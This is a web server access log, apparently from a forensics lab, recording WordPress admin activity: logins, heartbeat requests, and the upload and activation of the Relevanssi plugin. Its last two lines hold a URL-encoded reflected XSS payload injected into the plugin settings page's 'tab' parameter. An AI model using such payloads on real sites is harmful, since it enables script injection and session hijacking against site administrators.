2020-07-08 13:25:23 192.168.198.142 GET /forensics/wp-admin/ - 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-login.php?redirect_to=http%3A%2F%2Flocalhost%2Fforensics%2Fwp-admin%2Foptions-general.php%3Fsettings-updated%3Dtrue&reauth=1 200 0 0 1573
2020-07-08 13:25:23 192.168.198.142 GET /forensics/wp-includes/js/thickbox/thickbox.css ver=5.2.1 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 3
2020-07-08 13:25:23 192.168.198.142 GET /forensics/wp-admin/load-scripts.php c=1&load%5B%5D=jquery-core,jquery-migrate,utils&ver=5.2.1 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 35
2020-07-08 13:25:23 192.168.198.142 GET /forensics/wp-includes/css/editor.min.css ver=5.2.1 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 4
2020-07-08 13:25:23 192.168.198.142 GET /forensics/wp-admin/load-styles.php c=1&dir=ltr&load%5B%5D=dashicons,admin-bar,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-pointer,widgets&load%5B%5D=,site-icon,l10n,buttons,wp-auth-check&ver=5.2.1 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 83
2020-07-08 13:25:23 192.168.198.142 GET /forensics/wp-includes/js/dist/vendor/wp-polyfill.min.js ver=7.0.0 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 13
2020-07-08 13:25:23 192.168.198.142 GET /forensics/wp-admin/load-scripts.php c=1&load%5B%5D=hoverIntent,common,admin-bar,wp-ajax-response,jquery-color,wp-lists,quicktags,jquery-query,admin-comments,jquery-ui-core,jquery-&load%5B%5D=ui-widget,jquery-ui-mouse,jquery-ui-sortable,postbox,underscore,wp-util,wp-a11y,dashboard,thickbox,plugin-install,updates,shortc&load%5B%5D=ode,media-upload,svg-painter&ver=5.2.1 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 57
2020-07-08 13:25:23 192.168.198.142 GET /forensics/wp-includes/js/wp-auth-check.min.js ver=5.2.1 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 26
2020-07-08 13:25:23 192.168.198.142 GET /forensics/wp-includes/js/heartbeat.min.js ver=5.2.1 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 26
2020-07-08 13:25:23 192.168.198.142 GET /forensics/wp-includes/js/dist/hooks.min.js ver=2.2.0 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 26
2020-07-08 13:25:23 192.168.198.142 GET /forensics/wp-includes/js/jquery/ui/position.min.js ver=1.11.4 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 35
2020-07-08 13:25:23 192.168.198.142 GET /forensics/wp-includes/js/jquery/ui/menu.min.js ver=1.11.4 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 35
2020-07-08 13:25:23 192.168.198.142 GET /forensics/wp-includes/js/wplink.min.js ver=5.2.1 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 35
2020-07-08 13:25:23 192.168.198.142 GET /forensics/wp-includes/js/wp-emoji-release.min.js ver=5.2.1 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 30
2020-07-08 13:25:23 192.168.198.142 GET /forensics/wp-includes/js/jquery/ui/autocomplete.min.js ver=1.11.4 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 30
2020-07-08 13:25:23 192.168.198.142 GET /forensics/wp-includes/js/thickbox/loadingAnimation.gif - 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 7
2020-07-08 13:25:27 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 3524
2020-07-08 13:25:44 192.168.198.142 GET /forensics/wp-admin/ - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 - 302 0 0 1517
2020-07-08 13:25:45 192.168.198.142 GET /forensics/wp-login.php redirect_to=http%3A%2F%2F192.168.198.142%2Fforensics%2Fwp-admin%2F&reauth=1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 - 200 0 0 1437
2020-07-08 13:25:45 192.168.198.142 GET /forensics/wp-admin/css/login.min.css ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-login.php?redirect_to=http%3A%2F%2F192.168.198.142%2Fforensics%2Fwp-admin%2F&reauth=1 200 0 0 8
2020-07-08 13:25:45 192.168.198.142 GET /forensics/wp-admin/css/forms.min.css ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-login.php?redirect_to=http%3A%2F%2F192.168.198.142%2Fforensics%2Fwp-admin%2F&reauth=1 200 0 0 8
2020-07-08 13:25:45 192.168.198.142 GET /forensics/wp-admin/css/l10n.min.css ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-login.php?redirect_to=http%3A%2F%2F192.168.198.142%2Fforensics%2Fwp-admin%2F&reauth=1 200 0 0 8
2020-07-08 13:25:45 192.168.198.142 GET /forensics/wp-includes/css/dashicons.min.css ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-login.php?redirect_to=http%3A%2F%2F192.168.198.142%2Fforensics%2Fwp-admin%2F&reauth=1 200 0 0 49
2020-07-08 13:25:45 192.168.198.142 GET /forensics/wp-includes/css/buttons.min.css ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-login.php?redirect_to=http%3A%2F%2F192.168.198.142%2Fforensics%2Fwp-admin%2F&reauth=1 200 0 0 51
2020-07-08 13:25:45 192.168.198.142 GET /forensics/wp-admin/images/wordpress-logo.svg ver=20131107 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/css/login.min.css?ver=5.2.1 200 0 0 1
2020-07-08 13:25:54 192.168.198.142 POST /forensics/wp-login.php - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-login.php?redirect_to=http%3A%2F%2F192.168.198.142%2Fforensics%2Fwp-admin%2F&reauth=1 302 0 0 1475
2020-07-08 13:25:59 192.168.198.142 GET /forensics/wp-admin/ - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-login.php?redirect_to=http%3A%2F%2F192.168.198.142%2Fforensics%2Fwp-admin%2F&reauth=1 200 0 0 4710
2020-07-08 13:25:59 192.168.198.142 GET /forensics/wp-includes/js/thickbox/thickbox.css ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/ 200 0 0 5
2020-07-08 13:25:59 192.168.198.142 GET /forensics/wp-admin/load-scripts.php c=1&load%5B%5D=jquery-core,jquery-migrate,utils&ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/ 200 0 0 93
2020-07-08 13:25:59 192.168.198.142 GET /forensics/wp-admin/load-styles.php c=1&dir=ltr&load%5B%5D=dashicons,admin-bar,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-pointer,widgets&load%5B%5D=,site-icon,l10n,buttons,wp-auth-check&ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/ 200 0 0 102
2020-07-08 13:25:59 192.168.198.142 GET /forensics/wp-includes/css/editor.min.css ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/ 200 0 0 18
2020-07-08 13:25:59 192.168.198.142 GET /forensics/wp-includes/js/dist/vendor/wp-polyfill.min.js ver=7.0.0 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/ 200 0 0 43
2020-07-08 13:25:59 192.168.198.142 GET /forensics/wp-admin/load-scripts.php c=1&load%5B%5D=hoverIntent,common,admin-bar,wp-ajax-response,jquery-color,wp-lists,quicktags,jquery-query,admin-comments,jquery-ui-core,jquery-&load%5B%5D=ui-widget,jquery-ui-mouse,jquery-ui-sortable,postbox,underscore,wp-util,wp-a11y,dashboard,thickbox,plugin-install,updates,shortc&load%5B%5D=ode,media-upload,svg-painter&ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/ 200 0 0 50
2020-07-08 13:25:59 192.168.198.142 GET /forensics/wp-includes/js/dist/hooks.min.js ver=2.2.0 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/ 200 0 0 2
2020-07-08 13:25:59 192.168.198.142 GET /forensics/wp-includes/js/wplink.min.js ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/ 200 0 0 13
2020-07-08 13:25:59 192.168.198.142 GET /forensics/wp-includes/js/wp-auth-check.min.js ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/ 200 0 0 16
2020-07-08 13:25:59 192.168.198.142 GET /forensics/wp-includes/js/jquery/ui/autocomplete.min.js ver=1.11.4 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/ 200 0 0 2
2020-07-08 13:25:59 192.168.198.142 GET /forensics/wp-includes/js/heartbeat.min.js ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/ 200 0 0 48
2020-07-08 13:25:59 192.168.198.142 GET /forensics/wp-includes/js/jquery/ui/menu.min.js ver=1.11.4 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/ 200 0 0 49
2020-07-08 13:25:59 192.168.198.142 GET /forensics/wp-includes/js/jquery/ui/position.min.js ver=1.11.4 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/ 200 0 0 53
2020-07-08 13:25:59 192.168.198.142 GET /forensics/wp-includes/js/wp-emoji-release.min.js ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/ 200 0 0 1
2020-07-08 13:26:00 192.168.198.142 GET /forensics/wp-includes/js/thickbox/loadingAnimation.gif - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/ 200 0 0 41
2020-07-08 13:26:25 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 1471
2020-07-08 13:27:02 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/ 200 0 0 1486
2020-07-08 13:27:21 ::1 POST /forensics/wp-admin/admin-ajax.php - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 1476
2020-07-08 13:27:25 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 1575
2020-07-08 13:28:26 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 1430
2020-07-08 13:29:02 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/ 200 0 0 1448
2020-07-08 13:29:22 ::1 POST /forensics/wp-admin/admin-ajax.php - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 1503
2020-07-08 13:29:26 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 1536
2020-07-08 13:31:02 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/ 200 0 0 1542
2020-07-08 13:31:23 ::1 POST /forensics/wp-admin/admin-ajax.php - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 1422
2020-07-08 13:31:26 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 1430
2020-07-08 13:33:03 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/ 200 0 0 1563
2020-07-08 13:33:24 ::1 POST /forensics/wp-admin/admin-ajax.php - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 1581
2020-07-08 13:33:26 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 1463
2020-07-08 13:34:03 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/ 200 0 0 1604
2020-07-08 13:35:04 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/ 200 0 0 1503
2020-07-08 13:35:25 ::1 POST /forensics/wp-admin/admin-ajax.php - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 1491
2020-07-08 13:35:25 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 1484
2020-07-08 13:35:55 192.168.198.142 GET /forensics/wp-admin/plugins.php - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/ 200 0 64 1572
2020-07-08 13:35:56 192.168.198.142 GET /forensics/wp-admin/plugins.php - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/ 200 0 0 1682
2020-07-08 13:35:56 192.168.198.142 GET /forensics/wp-admin/load-scripts.php c=1&load%5B%5D=hoverIntent,common,admin-bar,underscore,wp-util,wp-a11y,updates,jquery-ui-core,thickbox,plugin-install,svg-painter&ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/plugins.php 200 0 0 80
2020-07-08 13:35:56 192.168.198.142 GET /forensics/wp-admin/images/spinner.gif - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/load-styles.php?c=1&dir=ltr&load%5B%5D=dashicons,admin-bar,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-pointer,widgets&load%5B%5D=,site-icon,l10n,buttons,wp-auth-check&ver=5.2.1 200 0 0 42
2020-07-08 13:36:05 192.168.198.142 GET /forensics/wp-admin/plugin-install.php - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/plugins.php 200 0 0 5354
2020-07-08 13:36:05 192.168.198.142 GET /forensics/wp-admin/load-scripts.php c=1&load%5B%5D=hoverIntent,common,admin-bar,jquery-ui-core,thickbox,plugin-install,underscore,wp-util,wp-a11y,updates,svg-painter&ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/plugin-install.php 200 0 0 42
2020-07-08 13:36:30 192.168.198.142 POST /forensics/wp-admin/update.php action=upload-plugin 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/plugin-install.php 200 0 0 13873
2020-07-08 13:36:30 192.168.198.142 GET /forensics/wp-admin/load-styles.php c=1&dir=ltr&load%5B%5D=dashicons,admin-bar,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-pointer,widgets&load%5B%5D=,site-icon,l10n,buttons&ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/update.php?action=upload-plugin 200 0 0 121
2020-07-08 13:36:30 192.168.198.142 GET /forensics/wp-admin/load-scripts.php c=1&load%5B%5D=hoverIntent,common,admin-bar,svg-painter&ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/update.php?action=upload-plugin 200 0 0 116
2020-07-08 13:36:48 192.168.198.142 GET /forensics/wp-admin/plugins.php action=activate&plugin=relevanssi%2Frelevanssi.php&_wpnonce=08f2ae4209 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/update.php?action=upload-plugin 302 0 0 15770
2020-07-08 13:36:51 192.168.198.142 GET /forensics/wp-admin/plugins.php activate=true&plugin_status=all&paged=1&s= 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/update.php?action=upload-plugin 200 0 0 2316
2020-07-08 13:37:22 192.168.198.142 GET /forensics/wp-admin/options-general.php page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String(%2FXSS%2F)%3Bx+%3D+x.substring(1%2C+x.length-1)%3Balert(x)%3C%2FSCRIPT%3E%3CBR+ 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 - 200 0 0 1596
2020-07-08 13:37:22 192.168.198.142 GET /forensics/wp-content/plugins/relevanssi/lib/admin_styles.css ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String(%2FXSS%2F)%3Bx+%3D+x.substring(1%2C+x.length-1)%3Balert(x)%3C%2FSCRIPT%3E%3CBR+ 200 0 0 32
